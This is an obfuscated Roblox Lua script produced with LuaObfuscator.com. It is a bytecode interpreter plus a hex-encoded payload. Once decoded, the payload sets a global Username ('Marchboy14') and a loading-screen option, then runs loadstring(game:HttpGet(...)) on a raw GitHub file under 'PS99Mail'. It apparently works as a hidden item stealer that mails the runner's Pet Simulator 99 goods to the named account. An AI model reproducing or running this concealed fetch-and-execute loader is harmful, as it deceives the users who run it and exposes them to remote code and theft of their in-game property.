--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v82,v19);v19=nil;v90=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0;local v84;while true do if (v83==0) then v84=(v31/((5 -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -((523 -156) + 201))) ;end end else local v85=927 -(214 + 713) ;local v86;while true do if (v85==0) then v86=(1 + 1)^(v32-(1 + (1065 -(68 + 997)))) ;return (((v31%(v86 + v86))>=v86) and 1) or (877 -((1552 -(226 + 1044)) + (2590 -1995))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=117 -(32 + 85) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (57 + 199)) + v36 ;end if (v35==(957 -(892 + 65))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;v35=1 -0 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(351 -(87 + 263))) then return (v42 * (16777396 -(67 + 113))) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + (15 -11) ;v38=1;end end end local function v24() local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,3 -2 ,36 -16 ) * ((2 + 0)^(1029 -(915 + 82)))) + v43 ;local v47=v20(v44,59 -(17 + 21) ,54 -23 );local v48=((v20(v44,32)==(1 + 0)) and  -1) or (1 -(438 -(145 + 293))) ;if (v47==0) then if (v46==(1187 -(1069 + 118))) then return v48 * (0 -0) ;else local v92=(430 -(44 + 386)) -0 ;while true do if (0==v92) then v47=(1487 -(998 + 488)) + 0 ;v45=0 -(0 + 0) ;break;end end end elseif (v47==(2031 + 16)) then return ((v46==0) and (v48 * ((792 -(368 + 423))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/(((6 + 1) -5)^(494 -(416 + 26))))) ;end local function v25(v49) local v50=772 -(201 + 571) ;local v51;local v52;while true do if (v50==(1139 -(116 + 1022))) then v51=v3(v16,v18,(v18 + v49) -((2 + 2) -3) );v18=v18 + v49 ;v50=2 + 0 ;end if (v50==3) then return v6(v52);end if (0==v50) then v51=nil;if  not v49 then local v99=0 -0 ;while true do if (v99==(0 -0)) then v49=v23();if (v49==(859 -(814 + (930 -(261 + 624))))) then return "";end break;end end end v50=2 -1 ;end if (v50==2) then v52={};for v93=1, #v51 do v52[v93]=v2(v1(v3(v51,v93,v93)));end v50=1 + (3 -1) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==1) then v56=nil;v57=nil;v53=2;end if (v53==(1 + 1)) then v58=nil;v59=nil;v53=3;end if (v53==0) then v54=0 -0 ;v55=nil;v53=1;end if (v53==(345 -(218 + 123))) then while true do if (v54==0) then v55=1581 -(1535 + 46) ;v56=nil;v54=1 + 0 ;end if (v54==(1 + 0)) then local v100=560 -(306 + 254) ;while true do if (v100~=1) then else v54=1 + 1 ;break;end if (v100==(0 -0)) then v57=nil;v58=nil;v100=1;end end end if (v54==(1470 -(899 + 568))) then v61=nil;while true do local v103=0 + 0 ;while true do if (v103==(2 -1)) then if (v55~=(603 -(268 + 335))) then else local v135=290 -(60 + 230) ;local v136;while true do if (v135==0) then v136=572 -(426 + 146) ;while true do if (v136==2) then v55=1 + 0 ;break;end if (v136==0) then local v162=0;local v163;while true do if (v162~=(1456 -(282 + 1174))) then else v163=811 -(569 + 242) ;while true do if (v163~=0) then else local v169=0;while true do if (v169==1) then v163=1;break;end if (v169==0) then v56={};v57={};v169=2 -1 ;end end end if (v163==1) then v136=1;break;end end break;end end end if (v136~=1) then else local v164=0;local v165;while true do if (v164~=(0 + 0)) then else v165=0;while true do if (v165==1) then v136=2;break;end if ((1024 -(706 + 318))~=v165) then else v58={};v59={v56,v57,nil,v58};v165=1;end end break;end end end end break;end end end break;end if (v103~=0) then else local v104=1271 -(945 + 326) ;local v105;while true do if (0==v104) then v105=0;while true do if (v105==0) then local v161=0 -0 ;while true do if (v161==1) then v105=1 + 0 ;break;end if (v161==(700 -(271 + 429))) then if (v55~=(2 + 0)) then else local v166=1500 -(1408 + 92) ;while true do local v168=1086 -(461 + 625) ;while true do if (0==v168) then if (v166==(1288 -(993 + 295))) then for v172=1,v23() do local v173=0 + 0 ;local v174;local v175;while true do if (v173~=(1171 -(418 + 753))) then else local v184=0 + 0 ;while true do if (v184~=0) then else v174=0 + 0 ;v175=nil;v184=1;end if (v184==(1 + 0)) then v173=1 + 0 ;break;end end end if (v173~=(530 -(406 + 123))) then else while true do if (v174==0) then v175=v21();if (v20(v175,1770 -(1749 + 20) ,1 + 0 )==0) then local v186=1322 -(1249 + 73) ;local v187;local v188;local v189;local v190;while true do if (v186==1) then local v192=0 + 0 ;while true do if (v192==(1145 -(466 + 679))) then v189=nil;v190=nil;v192=1;end if (v192~=1) then else v186=2;break;end end end if (v186==(4 -2)) then while true do if (v187~=(8 -5)) then else if (v20(v189,3,1903 -(106 + 1794) )~=(1 + 0)) then else v190[4]=v61[v190[4]];end v56[v172]=v190;break;end if (v187~=2) then else local v195=0 + 0 ;local v196;while true do if ((0 -0)==v195) then v196=0;while true do if (0==v196) then local v202=0;local v203;while true do if (v202==(0 -0)) then v203=114 -(4 + 110) ;while true do if (1==v203) then v196=585 -(57 + 527) ;break;end if (v203==0) then if (v20(v189,1,1)==1) then v190[2]=v61[v190[1429 -(41 + 1386) ]];end if (v20(v189,2,2)==(104 -(17 + 86))) then v190[3]=v61[v190[3]];end v203=1;end end break;end end end if (v196~=1) then else v187=3;break;end end break;end end end if (v187==0) then local v197=0 + 0 ;while true do if (v197~=0) then else v188=v20(v175,3 -1 ,8 -5 );v189=v20(v175,4,172 -(122 + 44) );v197=1;end if (v197~=(1 -0)) then else v187=3 -2 ;break;end end end if (v187~=(1 + 0)) then else local v198=0;local v199;while true do if ((0 + 0)==v198) then v199=0 -0 ;while true do if (v199~=(66 -(30 + 35))) then else v187=2 + 0 ;break;end if ((1257 -(1043 + 214))~=v199) then else v190={v22(),v22(),nil,nil};if (v188==(1212 -(323 + 889))) then local v204=0;local v205;local v206;local v207;while true do if (v204==(0 -0)) then v205=580 -(361 + 219) ;v206=nil;v204=1;end if ((321 -(53 + 267))==v204) then v207=nil;while true do if (v205==(1 + 0)) then while true do if (v206==(413 -(15 + 398))) then v207=982 -(18 + 964) ;while true do if (v207==0) then v190[11 -8 ]=v22();v190[3 + 1 ]=v22();break;end end break;end end break;end if (0==v205) then local v214=0;while true do if (v214==(1 + 0)) then v205=851 -(20 + 830) ;break;end if (v214~=0) then else v206=0;v207=nil;v214=1;end end end end break;end end elseif (v188==(1 + 0)) then v190[129 -(116 + 10) ]=v23();elseif (v188==(1 + 1)) then v190[3]=v23() -(2^16) ;elseif (v188==(741 -(542 + 196))) then local v215=0 -0 ;local v216;while true do if (v215~=(0 + 0)) then else v216=0;while true do if (v216~=(0 + 0)) then else v190[2 + 1 ]=v23() -(2^(41 -25)) ;v190[4]=v22();break;end end break;end end end v199=2 -1 ;end end break;end end end end break;end if (0==v186) then local v193=1551 -(1126 + 425) ;while true do if (v193~=1) then else v186=1;break;end if (v193~=(405 -(118 + 287))) then else v187=0 -0 ;v188=nil;v193=1;end end end end end break;end end break;end end end for v176=1,v23() do v57[v176-(1122 -(118 + 1003)) ]=v28();end v166=1;end if (v166~=(2 -1)) then else return v59;end break;end end end end if (1==v55) then local v167=377 -(142 + 235) ;while true do if (v167~=(9 -7)) then else v55=2;break;end if (v167==1) then local v170=0;while true do if (v170==0) then for v178=1,v60 do local v179=0;local v180;local v181;local v182;local v183;while true do if (v179==1) then v182=nil;v183=nil;v179=1 + 1 ;end if (v179==0) then v180=0;v181=nil;v179=1;end if (v179~=(979 -(553 + 424))) then else while true do if (v180==(0 -0)) then local v185=0;while true do if (v185==0) then v181=0;v182=nil;v185=1 + 0 ;end if (v185~=1) then else v180=1;break;end end end if (v180~=(1 + 0)) then else v183=nil;while true do if (0~=v181) then else v182=v21();v183=nil;v181=1;end if (v181==1) then if (v182==(1 + 0)) then v183=v21()~=0 ;elseif (v182==2) then v183=v24();elseif (v182~=(2 + 1)) then else v183=v25();end v61[v178]=v183;break;end end break;end end break;end end end v59[3]=v21();v170=1 + 0 ;end if (v170==1) then v167=4 -2 ;break;end end end if (0~=v167) then else v60=v23();v61={};v167=2 -1 ;end end end v161=2 -1 ;end end end if (1==v105) then v103=1 + 0 ;break;end end break;end end end end end break;end if (v54~=(9 -7)) then else local v101=753 -(239 + 514) ;local v102;while true do if (v101~=0) then else v102=0 + 0 ;while true do if (v102~=(1329 -(797 + 532))) then else local v137=0;while true do if (v137~=(1 + 0)) then else v102=1 + 0 ;break;end if (v137==(0 -0)) then v59=nil;v60=nil;v137=1;end end end if (v102~=1) then else v54=3;break;end end break;end end end end break;end if (v53~=(1205 -(373 + 829))) then else v60=nil;v61=nil;v53=735 -(476 + 255) ;end end end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81>0) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else local v106=0;local v107;local v108;local v109;local v110;while true do if (v106==2) then for v153=v107,v73 do v110=v110 + 1 ;v78[v153]=v108[v110];end break;end if (v106==1) then v73=(v109 + v107) -1 ;v110=0;v106=2;end if (v106==0) then v107=v80[2];v108,v109=v71(v78[v107](v13(v78,v107 + 1 ,v80[3])));v106=1;end end end elseif (v81==2) then local v111=v80[2];v78[v111]=v78[v111](v13(v78,v111 + 1 ,v73));else local v113=v80[2];local v114=v78[v80[3]];v78[v113 + 1 ]=v114;v78[v113]=v114[v80[4]];end elseif (v81<=5) then if (v81>4) then v64[v80[3]]=v78[v80[2]];else local v120=0;local v121;local v122;while true do if (v120==0) then v121=v80[2];v122=v78[v80[3]];v120=1;end if (1==v120) then v78[v121 + 1 ]=v122;v78[v121]=v122[v80[4]];break;end end end elseif (v81<=6) then do return;end elseif (v81==7) then v78[v80[2]]=v80[3];else v64[v80[3]]=v78[v80[2]];end elseif (v81<=12) then if (v81<=10) then if (v81>9) then v78[v80[2]]=v80[3];else local v125=v80[2];local v126,v127=v71(v78[v125](v13(v78,v125 + 1 ,v80[3])));v73=(v127 + v125) -1 ;local v128=0;for v133=v125,v73 do local v134=0;while true do if (v134==0) then v128=v128 + 1 ;v78[v133]=v126[v128];break;end end end end elseif (v81>11) then local v129=0;local v130;while true do if (v129==0) then v130=v80[2];v78[v130]=v78[v130](v13(v78,v130 + 1 ,v73));break;end end else do return;end end elseif (v81<=14) then if (v81>13) then v78[v80[2]]=v80[3]~=0 ;else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=15) then v78[v80[2]]();elseif (v81>16) then v78[v80[2]]();elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365726E616D65030A3O004D61726368626F79313403153O0073656C65637465644C6F6164696E675363722O656E03013O0032030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000E3O00120A3O00023O0012083O00013O00120A3O00043O0012083O00034O000D3O00013O0012083O00053O0012103O00063O001210000100073O00200300010001000800120A000300096O000100034O000C5O00022O000F3O000100012O00063O00017O00",v9(),...);
